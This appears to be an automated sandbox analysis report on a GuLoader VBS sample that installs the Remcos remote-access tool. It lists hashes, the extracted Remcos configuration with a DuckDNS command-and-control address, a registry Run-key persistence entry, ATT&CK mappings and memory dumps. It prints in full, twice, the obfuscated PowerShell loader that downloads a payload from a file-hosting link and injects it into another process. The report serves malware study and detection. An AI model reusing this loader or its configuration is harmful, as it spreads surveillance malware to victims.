guloader | b632a2ab492dbe0f71c18cab99b61bded82cbb66696f2d30c9bc354605ebb136

Analysis

max time kernel
55s
max time network
58s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
26/10/2023, 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BTSR000166442.vbs
Size

72KB
MD5

91192904788702d6692ef01f9a6d8989
SHA1

14f1f98a04b6eb9c3d22a522dc72cbf3221d00d6
SHA256

b632a2ab492dbe0f71c18cab99b61bded82cbb66696f2d30c9bc354605ebb136
SHA512

54f1bca79c4265c85c9a4d72426a7b97c52585674bf910294628b1c7ca979b5cfd538c42a665d06b768c603e720f7019d583d44e06802adb64b24c82a3bda345
SSDEEP

1536:fabO/mdBAdZ1tuJErgT2nOCzFx7zDiPWBvkkhO:Sbi2A31tAT2n1Fx3DOWBvkkhO

Score

10^/10

guloader remcos remotehost downloader persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-42EOAE
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gaardej = "%Casewa% -w 1 $Isaakadv=(Get-ItemProperty -Path 'HKCU:\\Nubbledno\\').Dirkenesu194;%Casewa% ($Isaakadv)"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
3444	wab.exe
3444	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4828	powershell.exe
3444	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4828 set thread context of 3444	4828	powershell.exe	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1832	powershell.exe
1832	powershell.exe
4828	powershell.exe
4828	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4828	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1480 wrote to memory of 1832	1480	WScript.exe	87
PID 1480 wrote to memory of 1832	1480	WScript.exe	87
PID 1832 wrote to memory of 4828	1832	powershell.exe	91
PID 1832 wrote to memory of 4828	1832	powershell.exe	91
PID 1832 wrote to memory of 4828	1832	powershell.exe	91
PID 4828 wrote to memory of 3444	4828	powershell.exe	97
PID 4828 wrote to memory of 3444	4828	powershell.exe	97
PID 4828 wrote to memory of 3444	4828	powershell.exe	97
PID 4828 wrote to memory of 3444	4828	powershell.exe	97
PID 4828 wrote to memory of 3444	4828	powershell.exe	97

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BTSR000166442.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "function Minimif ([String]$Asplanch){$Backingg = 8;For($Tricapsul=7; $Tricapsul -lt $Asplanch.Length-1; $Tricapsul+=$Backingg){$Tilvks=$Tilvks+$Asplanch.Substring($Tricapsul, 1)};$Tilvks;}$Tjrspri=Minimif 'ventekjhEpigramtfucusestDuplicepVrtdyrssSammenf:Boyards/Komiker/StickmedknottilrGuckedki ReprodvSkulkereRigsbib.RunderngProteseoTrimpreoAtrocoegAislemolSkrivesecaressk. EmnetwcAnsttelounfleecmUncashe/TrevlemuBefragtcCyclama?SideroneMembranxEmeticapSkandero Afdelir Photost upaaag= HjlpeodBlowoffoGruppemwMyxomasnBabassulKarnappoTheoreta DifferdTabulat&Vrngbili ProngbdGrundst=Disprac1Dibblesnbrowsin-LngdegrcbilimpoTHydratiO UntestzOpfindebKvaliteYAbiturer EstranzkusinenABalteterFilmkunxVaagnedpObskuraCKursusizSeptendrPnitentL Armora6KnkketsB Oxyben0Hvlbnke4 BanguiRPacificHBemandiqOverdon4Wilsonk_birkeniGUniteabjudenlann overst0 FerrattMeditat ';$Tilvks01=Minimif 'Sierrasi KlubhueFrasortxKonomid ';$monopylae= $Tilvks01;$Thalas = Minimif ' Porphy\MassagesAcetylsyMisknowsOpvoksew SalzfeononinflwQuinari6Kageske4Udmejsl\SkjorteW madammiSpunsninHypoderdNamedbeoIntagliwRegietss ColickPSnapsflo DrkarmwPerichoeDeklassr MaidenSKaolinehBrudefreBolsterl IgangslSybilla\JatrophvUntenty1Kymogra.Telefil0Fugleun\ FiskekpSemblanoSidelinwKispuspeValetedrMarketesDumfounh CoraczeTecaactl BandollAcineti. proteieStngninxArendaleAfstraf '; & ($Tilvks01) (Minimif 'Haendel$ModstanULugtesanRusserblKlangfuiIlanaantElectroi VaservgReceiveaBrnebid2Indgaae=Kighost$UkultureParleyinTrenchcvShoaled: LejekawPredisciForsknin FodboldCaptainiJargoner biocid ') ; . ($Tilvks01) (Minimif ' orneri$RallencT UnvigihVelstanaWienervlHundredaSkarptasKontakt=Subfree$SmertetUOsmolovnProfesslFleecediSpytklat BehypoiOverfrogGennemsa Unjack2 Stigma+omsadli$NondenuTSuperimhSukkervaComposilMemoranaLlingtasBoneset ') ; & ($Tilvks01) (Minimif ' Hyrekr$KvartseUAnnonactPlugginmTogrevimSwinglee BijektlKirkefei Sandflg Anisot nonopti=Begejst lystfar(Unfeign(BagganggStatsttwBengtelmAttractironspai WhitelywCovetisiSprgesknNodeskr3Underin2Beskyld_ Leptocp CunninrGelejdeoKiwikiwclocuscaeRntgenbsChatties Baldyr Polyand-ResprmiFSttedom MandatePCanonesrStomatoomultihec Fornike NittensgravrstsGlasnetIBlyantsdasfreds=Requite$ Kultiv{PadderoPRendestIOlecranDSknders}Tragtni)Approba.KravletCUdlaansoForstanmkalkvrkmPanganeaBibelfan Therefd TreachLunctimpivadsksdnPalamabeJespers)Leadpro Besmitt-elbowbos Unbosop OpkbeslMilieuaiFortolktordskif Skdesyn[RekviemcBedragehAscendea PrograrSnobdom]Heindri3Bookmak4Tyranni '); & ($Tilvks01) (Minimif ' Projek$ BernichPrognosyTwinlikrSkulkere Naturet ImmingsUndlivecTekstndoCallianiDissimi Defiles=Holoste Frihold$VagtmesUMuscicotverificmNonscrimsubgenieTremblelRingeuniTekknergEssayis[ Segreg$ infamiU sirupst CottonmMonologmBellowseUndershlCuttingi AaremagGiveren. AprjtecMalpracoSnefygnuHulledanCalcanetFortuna-Brierya2 Borger]Stammre '); .($Tilvks01) (Minimif 'Sprgere$LaanetsBgengivea EntusinUddanned Rotondl PrologyRenniogsLinjefa=android(OmstyrtTGulnbbeeSocagers HeterotForuren-TotemplP MalignaOuttyratKontinghSucurye Smaattr$LandsdoTBeholdnhHulkortaChampaklOmbrellaStandsnsCaptura)Benzins Taalmo- StumpiAKlepladnLbedecid Whumml janskee(Serinev[ PligteI Vilkaan BopladtAtomknuPElskerstHypersprUnstran] Kanons:Nabonul:gasturbsUninnoci SumbulzDerodidePterost Chinoo- ForkobeVulcaniqTempelr Timbale8 svovli)Partiti ') ;if ($Bandlys) { & $Thalas $hyretscoi;} else {;$Tilvks00=Minimif ' RysterSHalvmaatSkovhyta DumpinrPannelstEplotin-SpindhrB TagvaniTilintetBremsessSqualidTDemioxarBegyndeaPredecrnMentalhsChromatfNonvisueOutgangrdrowsih Dolcian-machiavSAlfedano TeternuUnderforFritidsc DatopaeUdddepa Sodsag$ ForyngT DrivanjMultinerEdwardisUnmobilpOpskrivrTerminsiTrstetr homoge-SengeneDHelfabreFriseris ConsumtIrreguli oedelanAnretteaHolohedt TordneiforfatnoReadjusn Spence Inhaust$BattlerUHeterosnBundfrolAffindeiMuskeletBenevoliAmpliatgNucleola Proecc2 Etymol '; . ($Tilvks01) (Minimif ' Monosy$TvangsaUSquarisnDriftsbl VerbaliElectictskranteiPaulasgg NervouaPseudon2 Recogn=Predisp$GkantereRequisin TypolovAktorsf:EfterstaHenvisspdeaktivp NotaridAlterbraUdspekut indkomaAnabolo ') ; & ($Tilvks01) (Minimif 'brdskriIGrydelamSpigerpp Erogeno JernmarBravuratGoodohu-StrstemMSnickleoFrenetidForsteruAnklagelUtricule sprogr DiskingBExpositiUnrestitSrbeskasIcositeT Forkvar Fotohaa OpskrinSmeechksPrespecfForsorgeClubionrGuttera ') ;$Unlitiga2=$Unlitiga2+'\freezed.Kry';while (-not $Uret) { & ($Tilvks01) (Minimif 'Abbedie$HomodynU VariatrOmfavneeProsopitXiphipl=Strombu(RekalkuTMedarbee AnaglysUnlistytEinkorn-UncompePPalaeoeaRenpristOphicalhPomsmal Teterne$GranuleUCounternBuderuplDecoloniAmphophtKontroliAdoptivgDermencaShillal2Militrg)udlejen ') ; & ($Tilvks01) $Tilvks00; & ($Tilvks01) (Minimif 'BrnerigSRedisputMetalloastilenertrophobt Stikli-MucovisSGazingllNicolinePlectrue Quillsp reluct Genose5Blamskv ');} & ($Tilvks01) (Minimif 'Skyggeb$LimbingEKeratombKasusinu PasteurVindigb Uncoach=Metateg SlidbaaGHeraldeeSlevenet Halvtr-UnsenatCLangtidoUnderben EmirertGrydelae KobraenCocinertJogging Appetit$EphemerURedenemn ComforlOverflaiDesignftOvergeniStormcegHydroscaDybblaa2Cuppasb '); .($Tilvks01) (Minimif 'Bennela$ChancieDquadrijrSquamaeaPalatalwInfoskeaCaidkufrSottesetArtille Svuppen= Dehumi Spring[UnjamheSpseudomyNarratrsLittondtForbikreParisermFlintov.forlydeC InhibioOverempnTrykfejv LeibnieAntabusrImponertBlodsud]Fedevar:Nabobyh:AuxiliaFDragesor BemestoskmtsommUnharmoBDonecklaSpuriousRentviseHornugl6Boloney4GainfulSPulsaartInddatarPrvelsliSemirurn IndsmugEctopla(Asyndet$SilicoaEKonvergbMeetlytuGennemsrAfstemn) hawaii '); & ($Tilvks01) (Minimif ' Itnonh$OphidseTnichelii FjaserlAabenplvSubtilikbegyndesGroundl2 augiti Skhiano=Respeci Argume[OzarkitS Blennoy ArbejdsFinindstVowersie FanefjmReparat.KlenodiTAlachahe kontokxKyphositSelvtil.BestrbeE KlbrignJournalcGestikuo farewedTelefoniReservanSteroidgStjgene] Forsyt: Filagr: UnoverAAmpulskSKapacitCssterstI dropskIkalewiv.PteroidGelektroe BaldritGennemlSSubjecttAlmindergeorassiAutarchnStetoskg gennem(Eksamen$ TessieD ReagenrHnsletvaRringenwKonditeaTrinflgrdidaktitKonnyci)Monitor '); . ($Tilvks01) (Minimif 'Magnumf$LavishiABayrersm CinchoaExpetibiExtremi=Sunrose$DuetsafT Rummeti Arbejdl FatalivTyrofelkAguardisHootmal2palliat.ApprehesProwutiuLandstrbSognebasEmbedmetSpuddler protociTarmenenOutbarkgAmfibie(Persons2Pillarw3Mrkedag9Aktions9Rjserne6Rrlgnin3Melipha,Ungrasp2Fotohan0Unorgan3Torpedo3Ametyst0Rearran)Affaire '); . ($Tilvks01) $Amai;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1832
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "function Minimif ([String]$Asplanch){$Backingg = 8;For($Tricapsul=7; $Tricapsul -lt $Asplanch.Length-1; $Tricapsul+=$Backingg){$Tilvks=$Tilvks+$Asplanch.Substring($Tricapsul, 1)};$Tilvks;}$Tjrspri=Minimif 'ventekjhEpigramtfucusestDuplicepVrtdyrssSammenf:Boyards/Komiker/StickmedknottilrGuckedki ReprodvSkulkereRigsbib.RunderngProteseoTrimpreoAtrocoegAislemolSkrivesecaressk. EmnetwcAnsttelounfleecmUncashe/TrevlemuBefragtcCyclama?SideroneMembranxEmeticapSkandero Afdelir Photost upaaag= HjlpeodBlowoffoGruppemwMyxomasnBabassulKarnappoTheoreta DifferdTabulat&Vrngbili ProngbdGrundst=Disprac1Dibblesnbrowsin-LngdegrcbilimpoTHydratiO UntestzOpfindebKvaliteYAbiturer EstranzkusinenABalteterFilmkunxVaagnedpObskuraCKursusizSeptendrPnitentL Armora6KnkketsB Oxyben0Hvlbnke4 BanguiRPacificHBemandiqOverdon4Wilsonk_birkeniGUniteabjudenlann overst0 FerrattMeditat ';$Tilvks01=Minimif 'Sierrasi KlubhueFrasortxKonomid ';$monopylae= $Tilvks01;$Thalas = Minimif ' Porphy\MassagesAcetylsyMisknowsOpvoksew SalzfeononinflwQuinari6Kageske4Udmejsl\SkjorteW madammiSpunsninHypoderdNamedbeoIntagliwRegietss ColickPSnapsflo DrkarmwPerichoeDeklassr MaidenSKaolinehBrudefreBolsterl IgangslSybilla\JatrophvUntenty1Kymogra.Telefil0Fugleun\ FiskekpSemblanoSidelinwKispuspeValetedrMarketesDumfounh CoraczeTecaactl BandollAcineti. proteieStngninxArendaleAfstraf '; & ($Tilvks01) (Minimif 'Haendel$ModstanULugtesanRusserblKlangfuiIlanaantElectroi VaservgReceiveaBrnebid2Indgaae=Kighost$UkultureParleyinTrenchcvShoaled: LejekawPredisciForsknin FodboldCaptainiJargoner biocid ') ; . ($Tilvks01) (Minimif ' orneri$RallencT UnvigihVelstanaWienervlHundredaSkarptasKontakt=Subfree$SmertetUOsmolovnProfesslFleecediSpytklat BehypoiOverfrogGennemsa Unjack2 Stigma+omsadli$NondenuTSuperimhSukkervaComposilMemoranaLlingtasBoneset ') ; & ($Tilvks01) (Minimif ' Hyrekr$KvartseUAnnonactPlugginmTogrevimSwinglee BijektlKirkefei Sandflg Anisot nonopti=Begejst lystfar(Unfeign(BagganggStatsttwBengtelmAttractironspai WhitelywCovetisiSprgesknNodeskr3Underin2Beskyld_ Leptocp CunninrGelejdeoKiwikiwclocuscaeRntgenbsChatties Baldyr Polyand-ResprmiFSttedom MandatePCanonesrStomatoomultihec Fornike NittensgravrstsGlasnetIBlyantsdasfreds=Requite$ Kultiv{PadderoPRendestIOlecranDSknders}Tragtni)Approba.KravletCUdlaansoForstanmkalkvrkmPanganeaBibelfan Therefd TreachLunctimpivadsksdnPalamabeJespers)Leadpro Besmitt-elbowbos Unbosop OpkbeslMilieuaiFortolktordskif Skdesyn[RekviemcBedragehAscendea PrograrSnobdom]Heindri3Bookmak4Tyranni '); & ($Tilvks01) (Minimif ' Projek$ BernichPrognosyTwinlikrSkulkere Naturet ImmingsUndlivecTekstndoCallianiDissimi Defiles=Holoste Frihold$VagtmesUMuscicotverificmNonscrimsubgenieTremblelRingeuniTekknergEssayis[ Segreg$ infamiU sirupst CottonmMonologmBellowseUndershlCuttingi AaremagGiveren. AprjtecMalpracoSnefygnuHulledanCalcanetFortuna-Brierya2 Borger]Stammre '); .($Tilvks01) (Minimif 'Sprgere$LaanetsBgengivea EntusinUddanned Rotondl PrologyRenniogsLinjefa=android(OmstyrtTGulnbbeeSocagers HeterotForuren-TotemplP MalignaOuttyratKontinghSucurye Smaattr$LandsdoTBeholdnhHulkortaChampaklOmbrellaStandsnsCaptura)Benzins Taalmo- StumpiAKlepladnLbedecid Whumml janskee(Serinev[ PligteI Vilkaan BopladtAtomknuPElskerstHypersprUnstran] Kanons:Nabonul:gasturbsUninnoci SumbulzDerodidePterost Chinoo- ForkobeVulcaniqTempelr Timbale8 svovli)Partiti ') ;if ($Bandlys) { & $Thalas $hyretscoi;} else {;$Tilvks00=Minimif ' RysterSHalvmaatSkovhyta DumpinrPannelstEplotin-SpindhrB TagvaniTilintetBremsessSqualidTDemioxarBegyndeaPredecrnMentalhsChromatfNonvisueOutgangrdrowsih Dolcian-machiavSAlfedano TeternuUnderforFritidsc DatopaeUdddepa Sodsag$ ForyngT DrivanjMultinerEdwardisUnmobilpOpskrivrTerminsiTrstetr homoge-SengeneDHelfabreFriseris ConsumtIrreguli oedelanAnretteaHolohedt TordneiforfatnoReadjusn Spence Inhaust$BattlerUHeterosnBundfrolAffindeiMuskeletBenevoliAmpliatgNucleola Proecc2 Etymol '; . ($Tilvks01) (Minimif ' Monosy$TvangsaUSquarisnDriftsbl VerbaliElectictskranteiPaulasgg NervouaPseudon2 Recogn=Predisp$GkantereRequisin TypolovAktorsf:EfterstaHenvisspdeaktivp NotaridAlterbraUdspekut indkomaAnabolo ') ; & ($Tilvks01) (Minimif 'brdskriIGrydelamSpigerpp Erogeno JernmarBravuratGoodohu-StrstemMSnickleoFrenetidForsteruAnklagelUtricule sprogr DiskingBExpositiUnrestitSrbeskasIcositeT Forkvar Fotohaa OpskrinSmeechksPrespecfForsorgeClubionrGuttera ') ;$Unlitiga2=$Unlitiga2+'\freezed.Kry';while (-not $Uret) { & ($Tilvks01) (Minimif 'Abbedie$HomodynU VariatrOmfavneeProsopitXiphipl=Strombu(RekalkuTMedarbee AnaglysUnlistytEinkorn-UncompePPalaeoeaRenpristOphicalhPomsmal Teterne$GranuleUCounternBuderuplDecoloniAmphophtKontroliAdoptivgDermencaShillal2Militrg)udlejen ') ; & ($Tilvks01) $Tilvks00; & ($Tilvks01) (Minimif 'BrnerigSRedisputMetalloastilenertrophobt Stikli-MucovisSGazingllNicolinePlectrue Quillsp reluct Genose5Blamskv ');} & ($Tilvks01) (Minimif 'Skyggeb$LimbingEKeratombKasusinu PasteurVindigb Uncoach=Metateg SlidbaaGHeraldeeSlevenet Halvtr-UnsenatCLangtidoUnderben EmirertGrydelae KobraenCocinertJogging Appetit$EphemerURedenemn ComforlOverflaiDesignftOvergeniStormcegHydroscaDybblaa2Cuppasb '); .($Tilvks01) (Minimif 'Bennela$ChancieDquadrijrSquamaeaPalatalwInfoskeaCaidkufrSottesetArtille Svuppen= Dehumi Spring[UnjamheSpseudomyNarratrsLittondtForbikreParisermFlintov.forlydeC InhibioOverempnTrykfejv LeibnieAntabusrImponertBlodsud]Fedevar:Nabobyh:AuxiliaFDragesor BemestoskmtsommUnharmoBDonecklaSpuriousRentviseHornugl6Boloney4GainfulSPulsaartInddatarPrvelsliSemirurn IndsmugEctopla(Asyndet$SilicoaEKonvergbMeetlytuGennemsrAfstemn) hawaii '); & ($Tilvks01) (Minimif ' Itnonh$OphidseTnichelii FjaserlAabenplvSubtilikbegyndesGroundl2 augiti Skhiano=Respeci Argume[OzarkitS Blennoy ArbejdsFinindstVowersie FanefjmReparat.KlenodiTAlachahe kontokxKyphositSelvtil.BestrbeE KlbrignJournalcGestikuo farewedTelefoniReservanSteroidgStjgene] Forsyt: Filagr: UnoverAAmpulskSKapacitCssterstI dropskIkalewiv.PteroidGelektroe BaldritGennemlSSubjecttAlmindergeorassiAutarchnStetoskg gennem(Eksamen$ TessieD ReagenrHnsletvaRringenwKonditeaTrinflgrdidaktitKonnyci)Monitor '); . ($Tilvks01) (Minimif 'Magnumf$LavishiABayrersm CinchoaExpetibiExtremi=Sunrose$DuetsafT Rummeti Arbejdl FatalivTyrofelkAguardisHootmal2palliat.ApprehesProwutiuLandstrbSognebasEmbedmetSpuddler protociTarmenenOutbarkgAmfibie(Persons2Pillarw3Mrkedag9Aktions9Rjserne6Rrlgnin3Melipha,Ungrasp2Fotohan0Unorgan3Torpedo3Ametyst0Rearran)Affaire '); . ($Tilvks01) $Amai;}"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Adds Run key to start application
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2dl3mpes.tyy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1832-42-0x000001E791E40000-0x000001E791E50000-memory.dmp

Filesize
64KB

Download
memory/1832-10-0x00007FFF4D3B0000-0x00007FFF4DE71000-memory.dmp

Filesize
10.8MB

Download
memory/1832-11-0x000001E791E40000-0x000001E791E50000-memory.dmp

Filesize
64KB

Download
memory/1832-12-0x000001E791E40000-0x000001E791E50000-memory.dmp

Filesize
64KB

Download
memory/1832-13-0x000001E791E40000-0x000001E791E50000-memory.dmp

Filesize
64KB

Download
memory/1832-0-0x000001E7ADD50000-0x000001E7ADD72000-memory.dmp

Filesize
136KB

Download
memory/1832-40-0x000001E791E40000-0x000001E791E50000-memory.dmp

Filesize
64KB

Download
memory/1832-36-0x00007FFF4D3B0000-0x00007FFF4DE71000-memory.dmp

Filesize
10.8MB

Download
memory/3444-70-0x0000000000E90000-0x00000000026AB000-memory.dmp

Filesize
24.1MB

Download
memory/3444-56-0x0000000000E90000-0x00000000026AB000-memory.dmp

Filesize
24.1MB

Download
memory/3444-55-0x00000000770D1000-0x00000000771F1000-memory.dmp

Filesize
1.1MB

Download
memory/3444-54-0x0000000077158000-0x0000000077159000-memory.dmp

Filesize
4KB

Download
memory/3444-53-0x0000000000E90000-0x00000000026AB000-memory.dmp

Filesize
24.1MB

Download
memory/3444-69-0x000000006ECF0000-0x000000006FF44000-memory.dmp

Filesize
18.3MB

Download
memory/3444-72-0x000000006ECF0000-0x000000006FF44000-memory.dmp

Filesize
18.3MB

Download
memory/3444-71-0x0000000000E90000-0x00000000026AB000-memory.dmp

Filesize
24.1MB

Download
memory/4828-37-0x00000000070B0000-0x0000000007146000-memory.dmp

Filesize
600KB

Download
memory/4828-48-0x0000000007530000-0x0000000007531000-memory.dmp

Filesize
4KB

Download
memory/4828-34-0x0000000007690000-0x0000000007D0A000-memory.dmp

Filesize
6.5MB

Download
memory/4828-33-0x0000000004A00000-0x0000000004A10000-memory.dmp

Filesize
64KB

Download
memory/4828-38-0x0000000007040000-0x0000000007062000-memory.dmp

Filesize
136KB

Download
memory/4828-39-0x00000000082C0000-0x0000000008864000-memory.dmp

Filesize
5.6MB

Download
memory/4828-32-0x0000000005E80000-0x0000000005ECC000-memory.dmp

Filesize
304KB

Download
memory/4828-41-0x0000000007410000-0x0000000007432000-memory.dmp

Filesize
136KB

Download
memory/4828-31-0x0000000005E40000-0x0000000005E5E000-memory.dmp

Filesize
120KB

Download
memory/4828-43-0x0000000007490000-0x00000000074A4000-memory.dmp

Filesize
80KB

Download
memory/4828-44-0x00000000746B0000-0x0000000074E60000-memory.dmp

Filesize
7.7MB

Download
memory/4828-45-0x0000000004A00000-0x0000000004A10000-memory.dmp

Filesize
64KB

Download
memory/4828-46-0x0000000004A00000-0x0000000004A10000-memory.dmp

Filesize
64KB

Download
memory/4828-35-0x00000000063F0000-0x000000000640A000-memory.dmp

Filesize
104KB

Download
memory/4828-49-0x0000000008870000-0x000000000A08B000-memory.dmp

Filesize
24.1MB

Download
memory/4828-50-0x0000000008870000-0x000000000A08B000-memory.dmp

Filesize
24.1MB

Download
memory/4828-51-0x0000000008870000-0x000000000A08B000-memory.dmp

Filesize
24.1MB

Download
memory/4828-52-0x00000000770D1000-0x00000000771F1000-memory.dmp

Filesize
1.1MB

Download
memory/4828-30-0x00000000057D0000-0x0000000005B24000-memory.dmp

Filesize
3.3MB

Download
memory/4828-20-0x00000000056E0000-0x0000000005746000-memory.dmp

Filesize
408KB

Download
memory/4828-19-0x0000000005670000-0x00000000056D6000-memory.dmp

Filesize
408KB

Download
memory/4828-18-0x0000000004F50000-0x0000000004F72000-memory.dmp

Filesize
136KB

Download
memory/4828-17-0x0000000005040000-0x0000000005668000-memory.dmp

Filesize
6.2MB

Download
memory/4828-16-0x0000000004A00000-0x0000000004A10000-memory.dmp

Filesize
64KB

Download
memory/4828-15-0x0000000002510000-0x0000000002546000-memory.dmp

Filesize
216KB

Download
memory/4828-14-0x00000000746B0000-0x0000000074E60000-memory.dmp

Filesize
7.7MB

Download